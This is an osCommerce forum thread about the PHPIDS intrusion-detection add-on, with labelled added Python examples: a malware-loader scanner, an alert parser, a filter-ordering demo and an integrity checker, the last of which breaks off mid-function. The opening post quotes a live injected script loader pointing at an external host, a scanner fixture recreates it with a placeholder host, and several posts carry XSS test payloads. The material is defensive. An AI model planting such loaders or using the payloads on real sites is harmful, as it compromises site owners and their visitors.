celextel (Author) Posted June 17, 2010

> Hello, I just found a virus on my site: includes/general.js line 192
> document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');
> and so on, more than 20 files infected; the security mod will not prevent this.

PHPIDS does not protect you from intrusions or viruses. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for viruses with a virus scanner provided by your host or another osCommerce module for detecting the virus. Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL: http://php-ids.org/forum/
pablito21050 Posted June 17, 2010

> PHPIDS does not protect you from intrusions or viruses. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for viruses with a virus scanner provided by your host or another osCommerce module for detecting the virus. Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL: http://php-ids.org/forum/

Yes, I mean I didn't get any warning message. I have already opened a thread on your forum.
celextel (Author) Posted June 17, 2010

> Yes, I mean I didn't get any warning message. I have already opened a thread on your forum.

You need to change your passwords for FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have a file manager there] and injected that code. PHPIDS detects only those intrusions which come in through your website catalog URL, via the query string. It would also not detect virus code which already exists in the files.
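The reply above draws the line that matters here: PHPIDS watches incoming requests, so code that has already been written into files on disk has to be found by a file scan. The script below is an added example, not part of PHPIDS or the osCommerce PHPIDS module, of the kind of check a host-side scanner does for the injection reported at the top of this thread: it walks a web root and flags a `document.write()` of a split `'<s'+'cript'` tag (the split is there to defeat a plain search for `<script`, which is itself the tell-tale) and any `<script src>` that points at a host outside an allow-list. The sample files, the allow-list and the `malware-host.invalid` placeholder are constructed for the demonstration.

```python
"""Scan a web root for injected script loaders.

Added example, not part of PHPIDS or the osCommerce module: PHPIDS only
inspects incoming requests, so code an attacker has already written into
files on disk must be found by a file scan such as this one. The sample
files, the allow-list and the placeholder host are all constructed.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Hosts the site legitimately loads scripts from (assumption for the demo).
ALLOWED_SCRIPT_HOSTS = {"ajax.googleapis.com"}

# A document.write() of a split '<s'+'cript' tag. Splitting the tag defeats a
# plain search for "<script", which is itself the tell-tale sign.
SPLIT_SCRIPT_WRITE = re.compile(
    r"""document\.write\(\s*["']<s["']\s*\+\s*["']cript""", re.IGNORECASE)

# Any script tag (whole or split) with an absolute src; group 1 is the host.
REMOTE_SCRIPT_SRC = re.compile(
    r"""<s(?:cript|["']\s*\+\s*["']cript)[^>]*?src\s*=\s*["']?https?://([^/"':\s>]+)""",
    re.IGNORECASE)

Finding = Tuple[int, str]   # (line number, reason)

def scan_file(path: str) -> List[Finding]:
    """Return one finding per suspicious pattern in a file."""
    findings: List[Finding] = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            if SPLIT_SCRIPT_WRITE.search(line):
                findings.append((lineno, "document.write of a split '<s'+'cript' tag"))
            for match in REMOTE_SCRIPT_SRC.finditer(line):
                host = match.group(1).lower()
                if host not in ALLOWED_SCRIPT_HOSTS:
                    findings.append((lineno, f"remote script from unexpected host {host}"))
    return findings

def scan_tree(root: str, exts=(".js", ".php", ".html", ".htm")) -> Dict[str, List[Finding]]:
    """Scan every file with a matching extension; keys are root-relative paths."""
    results: Dict[str, List[Finding]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                results[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return results

# Constructed sample site. The infected line has the shape of the one quoted
# in the thread, with a placeholder host in place of the real one.
SAMPLE_FILES = {
    "includes/general.js": (
        "function tep_hide(id) { return id; }\n"
        "document.write('<s'+'cript type=\"text/javascript\" "
        "src=\"http://malware-host.invalid:8080/CAD.js\"></scr'+'ipt>');\n"
    ),
    "includes/header.php": (
        '<script type="text/javascript" src="https://ajax.googleapis.com/lib.js"></script>\n'
    ),
    "catalog/index.php": "<?php echo 'hello'; ?>\n",
}

def build_sample_site() -> str:
    """Write the constructed files into a fresh temporary web root."""
    root = tempfile.mkdtemp(prefix="scan_demo_")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

def demo() -> Dict[str, List[Finding]]:
    """Build the sample site and scan it; only general.js should be reported."""
    return scan_tree(build_sample_site())

if __name__ == "__main__":
    for rel, found in demo().items():
        for lineno, reason in found:
            print(f"{rel}:{lineno}: {reason}")
```

Run against a real catalog, replace `build_sample_site()` with the web root and put the hosts your pages really load scripts from into `ALLOWED_SCRIPT_HOSTS`; the allow-list is what turns "remote script" from noise into a signal, and a hit on the split-tag pattern is worth treating as a compromise rather than a false positive, since no legitimate osCommerce file writes its script tags that way.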
pablito21050 Posted June 17, 2010

> You need to change your passwords for FTP and osCommerce Admin immediately. Someone seems to have got access to your files through FTP or osC Admin [if you have a file manager there] and injected that code. PHPIDS detects only those intrusions which come in through your website catalog URL, via the query string. It would also not detect virus code which already exists in the files.

Thanks celextel for understanding; I have already put the site offline and changed the FTP password. We are cleaning all infected files, but I need to find a solution; I'll contact you by PM.
pctekcomponents Posted July 13, 2010 (edited)

Hi, is it possible for PHPIDS to push server usage over 20%? I only ask as my website got disabled for a few minutes because of this. I also got an intrusion email:

The following attack has been detected by PHPIDS
Date: 2010-07-12T18:24:49-05:00
Impact: 10
Affected tags: xss csrf
Affected parameters: REQUEST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A, POST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A,
Request URI: %2Fcatalog%2Fbuilder_main.php%3Faction%3Dadd_products
Origin: 174.36.208.130

I was testing out a feature in my store and I'm not sure if there is an issue with the feature itself. Thanks

Edited July 13, 2010 by pctekcomponents
celextel (Author) Posted July 13, 2010

> Hi, is it possible for PHPIDS to push server usage over 20%? I only ask as my website got disabled for a few minutes because of this. I also got an intrusion email:
> The following attack has been detected by PHPIDS
> Impact: 10
> Affected tags: xss csrf
> Affected parameters: REQUEST.image POST.image
> I was testing out a feature in my store and I'm not sure if there is an issue with the feature itself. Thanks

We have been using PHPIDS on 5 of our websites and we have not noticed any push to server usage. This should be due to some other factor. The reported intrusion seems to be from the feature which you were trying to test. You could add these variables [REQUEST.image, POST.image] as Variable Exclusions if required.
pctekcomponents Posted July 20, 2010

Thanks Celextel. It turns out that Custom Product Builder doesn't appreciate " in any product descriptions. Is there any info on interpreting PHPIDS results? Any time I get a detection I have no idea what I'm looking at. For example, I got this intrusion notification a little while ago:

IP: 109.224.137.123
Date: 2010-07-20T15:16:53-05:00
Impact: 66
Affected tags: xss csrf id rfe lfi
Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D,
Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html
Origin: 174.36.208.130

I'm really not sure what any of the above means.
celextel (Author) Posted July 21, 2010

> Thanks Celextel. It turns out that Custom Product Builder doesn't appreciate " in any product descriptions. Is there any info on interpreting PHPIDS results? Any time I get a detection I have no idea what I'm looking at. For example, I got this intrusion notification a little while ago:
> IP: 109.224.137.123
> Date: 2010-07-20T15:16:53-05:00
> Impact: 66
> Affected tags: xss csrf id rfe lfi
> Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D,
> Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html
> Origin: 174.36.208.130
> I'm really not sure what any of the above means.

Interpreting PHPIDS results is not easy. You could go through the PHPIDS forum in regard to this. This seems to be an attack. You could verify the IP and ban it.
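As an aid to reading notifications like the two quoted in this thread, here is an added parser (not part of PHPIDS or the osCommerce module) for the `Key: value` layout of the e-mail. It URL-decodes the affected parameters and groups them by input name, which makes two things visible that the raw mail hides: PHPIDS lists each input once under `REQUEST` and again under its source array (`GET`, `POST` or `COOKIE`), so the six parameters in the second notification are three cookies; and the decoded values are `[CS]v4|...|[CE]` strings in cookies named `s_vi_*`, the shape and naming of the `s_vi` visitor-ID cookie set by Adobe (Omniture) analytics. Whether a hit is an attack or a false positive from a third-party cookie is exactly what this decoded view lets you weigh before banning an IP. The sample text is a constructed copy of the second notification.

```python
"""Parse a PHPIDS intrusion notification into a readable summary.

Added example, not part of PHPIDS or the osCommerce module. It assumes the
'Key: value' layout of the notifications quoted in this thread; the sample
below is a constructed copy of the second one.
"""
import re
from typing import Dict, List, NamedTuple
from urllib.parse import unquote

class Param(NamedTuple):
    source: str   # REQUEST, GET, POST or COOKIE
    name: str
    value: str    # URL-decoded

class Report(NamedTuple):
    ip: str
    date: str
    impact: int
    tags: List[str]
    params: List[Param]
    request_uri: str
    origin: str

KEYS = ("IP", "Date", "Impact", "Affected tags", "Affected parameters", "Request URI", "Origin")
# The mail body may arrive as one long line, so split on the known keys, not on newlines.
KEY_SPLIT = re.compile(r"\b(" + "|".join(re.escape(k) for k in KEYS) + r"):\s*")

def parse_report(text: str) -> Report:
    """Split the text on the known keys and URL-decode the interesting fields."""
    pieces = KEY_SPLIT.split(text)          # [preamble, key, value, key, value, ...]
    fields: Dict[str, str] = {k: v.strip().rstrip(",") for k, v in zip(pieces[1::2], pieces[2::2])}
    params: List[Param] = []
    for item in fields.get("Affected parameters", "").split(","):
        item = item.strip()
        if not item:
            continue
        qualified, _, raw = item.partition("=")      # e.g. COOKIE.s_vi_x=%5BCS%5D...
        source, _, name = qualified.partition(".")
        params.append(Param(source, name, unquote(raw)))
    return Report(
        ip=fields.get("IP", ""),
        date=fields.get("Date", ""),
        impact=int(fields.get("Impact", "0") or 0),
        tags=fields.get("Affected tags", "").split(),
        params=params,
        request_uri=unquote(fields.get("Request URI", "")),
        origin=fields.get("Origin", ""),
    )

def by_input(report: Report) -> Dict[str, Dict[str, str]]:
    """Group parameters by input name: REQUEST.x is the same input as GET/POST/COOKIE.x."""
    grouped: Dict[str, Dict[str, str]] = {}
    for p in report.params:
        grouped.setdefault(p.name, {})[p.source] = p.value
    return grouped

def summarize(report: Report) -> str:
    """One line per distinct input, with the sources it was seen in."""
    lines = [f"{report.date}  impact={report.impact}  tags={','.join(report.tags)}",
             f"from {report.ip} to {report.request_uri} (server {report.origin})"]
    for name, sources in by_input(report).items():
        value = next(iter(sources.values()))
        lines.append(f"  {name} via {'/'.join(sorted(sources))}: {value!r}")
    return "\n".join(lines)

# Constructed copy of the second notification quoted in the thread.
SAMPLE_NOTIFICATION = (
    "The following attack has been detected by PHPIDS "
    "IP: 109.224.137.123 Date: 2010-07-20T15:16:53-05:00 Impact: 66 "
    "Affected tags: xss csrf id rfe lfi "
    "Affected parameters: "
    "REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, "
    "Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html "
    "Origin: 174.36.208.130"
)

def parse_sample() -> Report:
    return parse_report(SAMPLE_NOTIFICATION)

if __name__ == "__main__":
    print(summarize(parse_sample()))
```

The first notification in the thread (the `REQUEST.image` / `POST.image` pair with `::`-separated `get_product_image.php?id=...` values) parses the same way and collapses to one input, `image`, seen via POST; that is the case where a Variable Exclusion for a known-good parameter is the right response, whereas a cookie value you did not set yourself deserves a look at where it comes from before any ban.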
ozstar Posted July 26, 2010

Hi, I have tried to install phpids version 1.6; however, the install file mentions files which are not in 1.6. I went and got 1.4 and 1.5 and the files are not in there either. All packages say the zip is a full package. Can we have an install file that is relevant for 1.6 please, as we would like to install it. Thank you, oz :-)
celextel (Author) Posted July 26, 2010

> Hi, I have tried to install phpids version 1.6; however, the install file mentions files which are not in 1.6. I went and got 1.4 and 1.5 and the files are not in there either. All packages say the zip is a full package. Can we have an install file that is relevant for 1.6 please, as we would like to install it. Thank you, oz :-)

You need to install the latest one. It has all the files. Please let us know exactly which of the files is not in that package.
ozstar Posted July 28, 2010

Thank you for the reply. These are the files in the latest package; however, the install file mentions other files. Regards, oz :-)

In the /phpidsPHPIDS_for_oscommerce_1_6/ directory:
  Read_Me.htm
  banned.php
  GPL.txt
and these dirs:
  /admin/
    banned_ip.php
    phpids_installer.php
    phpids_report.php
  /admin/includes/
    /functions/
      version_checker.php
    /languages/
      /english/
        banned_ip.php
        phpids_report.php
        version_checker.php
  /cache/
    index.php
  /includes/
    /modules/
      banned_ip.php
      osc_phpids.php
celextel (Author) Posted July 28, 2010

> Thank you for the reply. These are the files in the latest package; however, the install file mentions other files. Regards, oz :-)
> In the /phpidsPHPIDS_for_oscommerce_1_6/ directory: Read_Me.htm banned.php GPL.txt
> and these dirs: /admin/ banned_ip.php phpids_installer.php phpids_report.php /admin/includes/ /functions/ version_checker.php /languages/ /english/ banned_ip.php phpids_report.php version_checker.php /cache/ index.php /includes/ /modules/ banned_ip.php osc_phpids.php

You need to download "PHPIDS 0.6.4 (ZIP)" or the latest version at: http://php-ids.org/downloads/ Please let us know exactly which of the files are missing other than this one.
ozstar Posted July 28, 2010

Hi, okay, I did get the files from the main PHPIDS site above and they are very different from what is at the osC add-on contrib site. Anyway, this 0.6.4 has the dirs docs/, libs/ and test/. Now, before I install these, should I delete everything I installed before, e.g. the dirs and files I mention above, and start anew? Thanks, oz :-)
celextel (Author) Posted July 29, 2010

> Hi, okay, I did get the files from the main PHPIDS site above and they are very different from what is at the osC add-on contrib site. Anyway, this 0.6.4 has the dirs docs/, libs/ and test/. Now, before I install these, should I delete everything I installed before, e.g. the dirs and files I mention above, and start anew? Thanks, oz :-)

You need to install both [core files from the PHPIDS website and module files from the add-on section] as mentioned in our Read Me file. Please go through that file carefully and do the installation as mentioned therein.
hetmana Posted August 1, 2010

I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4. The first phase of the install went perfectly: got the table creation confirmation, and the OSC admin panel has all the appropriate Configuration and Tools entries. I left all settings completely default. Then I uploaded the new and changed files for the catalog. After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples. Both times I got the following message:

Exception: 23000, 1048, Column 'origin' cannot be null

When I went to the admin panel to check the log: no entries. I've gone over the instructions to make sure I did everything correctly 4 times; CHMOD was done right when I uploaded (rechecked); checked my database, and the new tables are there. Any suggestions would be immensely appreciated. I don't have any idea where to chase this.
celextel (Author) Posted August 2, 2010

> I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4. After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples. Both times I got the following message:
> Exception: 23000, 1048, Column 'origin' cannot be null

The "phpids_intrusions" db table has a column named "origin" to record the server IP automatically. It is unable to do this. You need to enable error handling and find out why this is not happening. If you are unable to find a solution to this, please set "Null" for this column to "Yes" in this table in your MySQL DB through phpMyAdmin.
hetmana Posted August 3, 2010

> If you are unable to find a solution to this, please set "Null" for this column to "Yes" in this table in your MySQL DB through phpMyAdmin.

My error handling is set to ALL. I reset the error log so that I can see specifically what today's problem is. When I attempted the test URLs from the ReadMe, I was of course still getting the error previously mentioned, so I set origin to Null. Now at the top of my page, I get:

------------------------------
Total impact: 8
Affected tags: xss, csrf
Variable: REQUEST.test | Value: \">XXX
Impact: 4 | Tags: xss, csrf
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Variable: GET.test | Value: \">XXX
Impact: 4 | Tags: xss, csrf
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102
------------------------------

followed by the rest of my page just like normal. Still have NOTHING in the error log. Thank you for helping me out with this. I really appreciate it.
celextel (Author) Posted August 3, 2010

> Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102

We do not know why you are getting this error message. You need to enable error logging in your hosting account. If you are unable to do this yourself, you have to request your hosting provider to do this.
♥altoid Posted August 8, 2010

> The "phpids_intrusions" db table has a column named "origin" to record the server IP automatically. It is unable to do this. You need to enable error handling and find out why this is not happening. If you are unable to find a solution to this, please set "Null" for this column to "Yes" in this table in your MySQL DB through phpMyAdmin.

By going in through phpMyAdmin and manually changing the origin row to null as follows:

origin varchar(15) latin1_swedish_ci Yes NULL

I was able to get this to work. However, for the second test:

?test="><script>eval(window.name)</script>

when I run this I get:

Forbidden
You don't have permission to access page_name.html on this server

I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
♥altoid Posted August 9, 2010

> Anti XSS [XSS Shield]: PHPIDS would not work fully if you use this as some of the query strings get sanitized. You do not require this if you use Security Pro as both of them have almost the same functions.

I want to make sure I follow the logic on this. With Anti XSS [XSS Shield] installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function; do I have that correct? With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection and do its job, but in at least some cases the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate? Thanks much.
celextel (Author) Posted August 10, 2010

> However, for the second test:
> ?test="><script>eval(window.name)</script>
> when I run this I get:
> Forbidden
> You don't have permission to access page_name.html on this server

We do not have a file named page_name.html in our module. You need to find out which module is using this file. Perhaps some other contribution may be interfering with our contribution.
celextel (Author) Posted August 10, 2010

> I want to make sure I follow the logic on this. With Anti XSS [XSS Shield] installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function; do I have that correct? With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection and do its job, but in at least some cases the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate? Thanks much.

You are correct. PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS.
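The exchange above comes down to ordering: a filter that blocks or sanitizes the request before PHPIDS sees it leaves the IDS nothing (or less) to log, while a sanitizer that runs after the IDS keeps the log and still neutralizes the value. The following added example, not code from Anti XSS, Security Pro or the PHPIDS module, models the three components as small functions (a blocking shield, an escaping sanitizer and a scoring detector) with a constructed three-signature rule set standing in for the PHPIDS filter list, and runs the second Read Me test string from this thread through each ordering.

```python
"""Filter ordering: what an IDS can still log after a shield or sanitizer runs.

Added example; not code from Anti XSS, Security Pro or the PHPIDS module.
Each component is a small function, and the rule set is a constructed
three-signature stand-in for the PHPIDS filter list.
"""
import html
import re
from typing import Dict, List, Tuple

Request = Dict[str, str]

# Constructed rules: (pattern, impact weight, description).
RULES = [
    (re.compile(r"""["']\s*>"""), 4, "html breaking injection"),
    (re.compile(r"<\s*script", re.IGNORECASE), 6, "script tag"),
    (re.compile(r"\beval\s*\("), 5, "eval call"),
]

def detect(params: Request) -> Tuple[int, List[str]]:
    """Score the values as an IDS would; returns (total impact, findings)."""
    impact, findings = 0, []
    for name, value in params.items():
        for rx, weight, desc in RULES:
            if rx.search(value):
                impact += weight
                findings.append(f"{name}: {desc}")
    return impact, findings

def sanitize(params: Request) -> Request:
    """Escape HTML metacharacters so a value is inert when echoed (Security Pro style)."""
    return {k: html.escape(v, quote=True) for k, v in params.items()}

def pipeline(params: Request, order: Tuple[str, ...]) -> dict:
    """Run the named stages in order and report status, final values and IDS log.

    'shield'   blocking filter: any hit ends the request with 403 before later stages
    'sanitize' escape the values and continue
    'ids'      score the values as they are at that point and log a hit
    """
    ids_log: List[dict] = []
    for stage in order:
        if stage == "shield":
            if detect(params)[0] > 0:
                return {"status": 403, "params": params, "ids_log": ids_log}
        elif stage == "sanitize":
            params = sanitize(params)
        elif stage == "ids":
            impact, findings = detect(params)
            if impact > 0:
                ids_log.append({"impact": impact, "findings": findings})
        else:
            raise ValueError(f"unknown stage {stage!r}")
    return {"status": 200, "params": params, "ids_log": ids_log}

# Constructed request carrying the second test string from the module's Read Me.
SAMPLE_REQUEST: Request = {"test": '"><script>eval(window.name)</script>'}

def compare_orders() -> Dict[str, dict]:
    """The three arrangements discussed in the thread, side by side."""
    return {
        "shield_then_ids": pipeline(SAMPLE_REQUEST, ("shield", "ids", "sanitize")),
        "sanitize_then_ids": pipeline(SAMPLE_REQUEST, ("sanitize", "ids")),
        "ids_then_sanitize": pipeline(SAMPLE_REQUEST, ("ids", "sanitize")),
    }

if __name__ == "__main__":
    for label, result in compare_orders().items():
        print(f"{label}: status={result['status']} logged={result['ids_log']}")
```

With the shield first the request dies with a 403 and the IDS log stays empty, which is the behaviour altoid saw; with the sanitizer first the escaped value no longer matches the tag-breaking signatures, so only the `eval(` rule still fires and the recorded impact drops from 15 to 5 (PHPIDS "would not work fully"); with the IDS first the full finding is logged and the value that reaches the application is still the escaped one. The general rule is that detection belongs before any transformation of the input, and output encoding belongs after it.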
♥altoid Posted August 10, 2010

> We do not have a file named page_name.html in our module. You need to find out which module is using this file. Perhaps some other contribution may be interfering with our contribution.

Since posting my observation I removed XSS [XSS Shield] and reran test 2. That error page I asked about disappeared on the second run, and the module functioned as it was supposed to. Thanks much.
♥altoid Posted August 10, 2010

> You are correct. PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS.

Hello, with Anti XSS now removed from my system and Security Pro installed as per the instructions in the PHPIDS read me, all appears OK. However, I have noticed that when I run Site Monitor, there are 18 files that keep recurring in the report even after I delete the Site Monitor reference file. The recurring files are located in these directories:

includes/phpids/lib/IDS/tmp/
includes/phpids/lib/IDS/vendors/

I found I can get them to stop appearing in the Site Monitor report if I exclude them in the configure part of Site Monitor, but I thought I'd mention the situation for discussion's sake. I am presuming there is something dynamic about these files that makes them constantly change; perhaps that's how they work. Thanks for your assistance.
celextel (Author) Posted August 11, 2010

> includes/phpids/lib/IDS/tmp/
> includes/phpids/lib/IDS/vendors/

Yes, you have to add these directories in Site Monitor under exclusions. We are also using Site Monitor.
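For the Site Monitor situation above, here is an added example (not Site Monitor's code) of the baseline-and-compare check such a tool performs, with an exclusion list for paths that legitimately change. It records the SHA-256 of every file under a web root, saves that baseline outside the root, and on the next run reports files that were added, removed or modified, skipping the two PHPIDS directories named in the thread. The sample tree, the cache file names and the between-run changes are all constructed.

```python
"""Baseline-and-compare file integrity check with path exclusions.

Added example, not the Site Monitor add-on's code. Hashes every file under
a web root, saves the baseline as JSON, and reports added, removed and
modified files on the next run, skipping excluded directories (the two
PHPIDS paths from the thread). The sample tree is constructed.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List, Sequence

# Root-relative paths whose contents change during normal operation and
# would otherwise show up on every run.
EXCLUDED_PREFIXES: Sequence[str] = (
    "includes/phpids/lib/IDS/tmp/",
    "includes/phpids/lib/IDS/vendors/",
)

def sha256_file(path: str) -> str:
    """Hash a file in chunks so large files do not need to be read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(root: str, excluded: Sequence[str] = EXCLUDED_PREFIXES) -> Dict[str, str]:
    """Map each non-excluded file (root-relative path) to its SHA-256."""
    hashes: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if any(rel.startswith(prefix) for prefix in excluded):
                continue
            hashes[rel] = sha256_file(full)
    return hashes

def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report what changed between two snapshots."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }

def save_baseline(path: str, hashes: Dict[str, str]) -> None:
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(hashes, fh, indent=2, sort_keys=True)

def load_baseline(path: str) -> Dict[str, str]:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)

# Constructed sample site; the file names under the PHPIDS paths are placeholders.
SAMPLE_TREE = {
    "includes/general.js": "function a(){}\n",
    "includes/phpids/lib/IDS/tmp/filter.cache": "cache v1\n",
    "includes/phpids/lib/IDS/vendors/lib.php": "<?php // third-party library\n",
    "catalog/index.php": "<?php echo 1;\n",
    "catalog/old.php": "<?php echo 2;\n",
}

def write_tree(root: str, files: Dict[str, str]) -> None:
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)

def demo() -> Dict[str, List[str]]:
    """Take a baseline, simulate changes between runs, and report the diff."""
    root = tempfile.mkdtemp(prefix="webroot_")
    store = tempfile.mkdtemp(prefix="baseline_")   # keep the baseline outside the web root
    write_tree(root, SAMPLE_TREE)
    baseline_file = os.path.join(store, "baseline.json")
    save_baseline(baseline_file, snapshot(root))
    # Simulated changes: an excluded cache file churns (ignored), one tracked
    # file is edited (modified), one appears (added) and one vanishes (removed).
    write_tree(root, {
        "includes/phpids/lib/IDS/tmp/filter.cache": "cache v2\n",
        "includes/general.js": "function a(){}\nvar injected = 1;\n",
        "catalog/new_file.php": "<?php // unexpected new file\n",
    })
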